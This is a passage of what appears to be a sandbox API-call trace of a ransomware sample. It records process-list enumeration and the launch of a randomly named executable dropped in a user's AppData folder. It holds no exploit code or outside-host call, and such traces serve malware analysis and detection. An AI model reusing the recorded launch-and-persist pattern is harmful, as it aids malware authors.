returned 12 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32Next") returned 0x769a0942 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32FirstW", cchWideChar=14, lpMultiByteStr=0x13e2d2c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32FirstW", lpUsedDefaultChar=0x0) returned 14 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32FirstW") returned 0x7694c59e [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.098] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Module32NextW", cchWideChar=13, lpMultiByteStr=0x13e2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module32NextW", lpUsedDefaultChar=0x0) returned 13 [0093.098] GetProcAddress (hModule=0x76910000, lpProcName="Module32NextW") returned 0x7694c11f [0093.098] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0093.105] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.107] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.108] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.109] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.110] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.111] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.112] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.113] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0093.114] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.115] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.116] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.120] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.121] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.122] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.125] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0093.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0093.134] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0093.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0093.137] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0093.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0093.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0093.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0093.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0093.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0093.144] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0093.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0093.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0093.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0093.148] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0093.149] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0093.150] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0093.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0093.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0093.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0093.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa78, pcPriClassBase=8, dwFlags=0x0, szExeFile="2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe")) returned 1 [0093.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.160] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0093.162] CloseHandle (hObject=0xc4) returned 1 [0093.162] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O", lpProcessInformation=0x12fc04*(hProcess=0xc0, hThread=0xc4, dwProcessId=0xacc, dwThreadId=0xad0)) returned 1 [0093.336] CloseHandle (hObject=0xc0) returned 1 [0093.336] CloseHandle (hObject=0xc4) returned 1 [0093.336] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc8 [0093.341] Process32FirstW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.342] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.342] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.343] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.344] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.344] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.345] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.346] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.346] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.347] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0093.348] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.348] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.349] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.350] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.350] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.351] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.352] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.352] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.353] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: 